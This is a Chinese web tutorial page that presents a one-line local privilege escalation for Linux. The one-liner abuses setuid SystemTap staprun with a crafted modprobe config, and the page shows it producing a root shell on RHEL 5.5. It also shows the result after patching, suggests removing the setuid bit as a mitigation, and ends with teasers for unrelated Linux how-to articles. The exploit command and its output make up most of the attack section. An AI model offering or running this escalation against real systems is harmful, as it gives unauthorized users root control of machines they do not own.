linux一句话轻松提权

linux命令：‍
[b@fuckks~]$ printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTI*****="-C exploit.conf" staprun -u whatever

sh-3.2# uname -a

Linux xlsec 2.6.18-194.el5 #1 SMP Tue Mar 16 21:52:43 EDT 2010 i686 i686 i386 GNU/Linux

sh-3.2# cat /etc/redhat-release

Red Hat Enterprise Linux Server release 5.5 (Tikanga)

sh-3.2#

去打补丁吧，补上补丁之后的效果如下：

‍[b@fuckks~]$ printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTI*****="-C exploit.conf" staprun -u whatever

-bash: /usr/bin/staprun: Permission denied

[b@fuckks~]$

linux批量打补丁）没有补丁的，把‍/usr/bin/staprun这个东西的s位去掉，也可以应付的哦，如下：
[a@fuckks2~]$ printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTI*****="-C exploit.conf" staprun -u whatever

ERROR: The effective user ID of staprun must be set to the root user.

Check permissi***** on staprun and ensure it is a setuid root program.

[a@fuckks2~]$

注：此类漏洞常被不少用于web注入的木马以达到快速提权侵占系统的目的

linux一句话 轻松提权的相关教程结束。

《linux一句话轻松提权.doc》

下载本文的Word格式文档，以方便收藏与打印。

相关推荐

linux如何切换当前目录到根目录

在 Linux 系统中，要切换当前工作目录到根目录，你可以使用 cd 命令，后面跟上 / 符号。以下是具体操作： cd / 执行这条命令后，你的当前工作目录将切换到根目录。可以使用 pwd 命令来查看当前工作目录，以确认...
2024-05-15编程代码Linux
linux编译安装和快速安装有什么区别

Linux的编译安装和快速安装是两种不同的安装方式，它们的主要区别在于安装过程的复杂程度和安装包的来源。编译安装：编译安装是指通过源代码编译的方式来安装软件包。用户需要先下载源代码，然后解压、配置...
2024-05-15编程代码Linux
linux编译安装软件的方法是什么

编译安装软件是一种在Linux系统中安装软件的方法，通常用于那些没有提供预编译包的软件。以下是在Linux系统中编译安装软件的一般步骤：下载源代码包：首先在软件官方网站或者开源代码库中下载软件的源代码包，...
2024-05-15编程代码Linux
ubuntu怎么编译linux内核

编译Linux内核是一个复杂的过程，但在Ubuntu上可以通过以下步骤来编译Linux内核：安装必要的软件包：在终端中运行以下命令安装编译内核所需的软件包： sudo apt-get update sudo apt-get install build-essent...
2024-05-15编程代码Linux,Ubuntu
Linux修改时间无效怎么处理

如果在Linux系统中修改时间无效，可能是因为系统的时钟同步服务出现了问题，可以尝试以下方法来处理：使用命令手动同步时间：可以使用命令sudo ntpdate time.nist.gov来手动同步时间。这会从NIST的时间服务器...
2024-05-15编程代码Linux
怎么使用linux的top命令看指定进程

要使用Linux的top命令来查看指定进程，可以按照以下步骤操作：打开终端窗口，输入以下命令启动top命令： top 在top命令的界面中，按下键盘上的 “O” 键（大写字母）来进入筛选模式。在出现的提示框中输入...
2024-05-13编程代码Linux
linux的top命令如何看内存

在Linux系统上使用top命令查看内存信息的方式如下：打开终端，并输入以下命令来启动top命令： top 在top命令的输出中，可以看到内存信息的相关内容。例如，可以看到总内存量、已使用内存量、空闲内存量等信...
2024-05-13编程代码Linux
linux中top命令的使用方法是什么

Linux中top命令是一个动态监视进程活动的工具。它显示系统中运行的进程列表，并提供有关进程的实时性能数据。要使用top命令，只需在终端中键入以下命令： top 按下Enter键后，top命令将显示一个实时更新的进程列...
2024-05-13编程代码Linux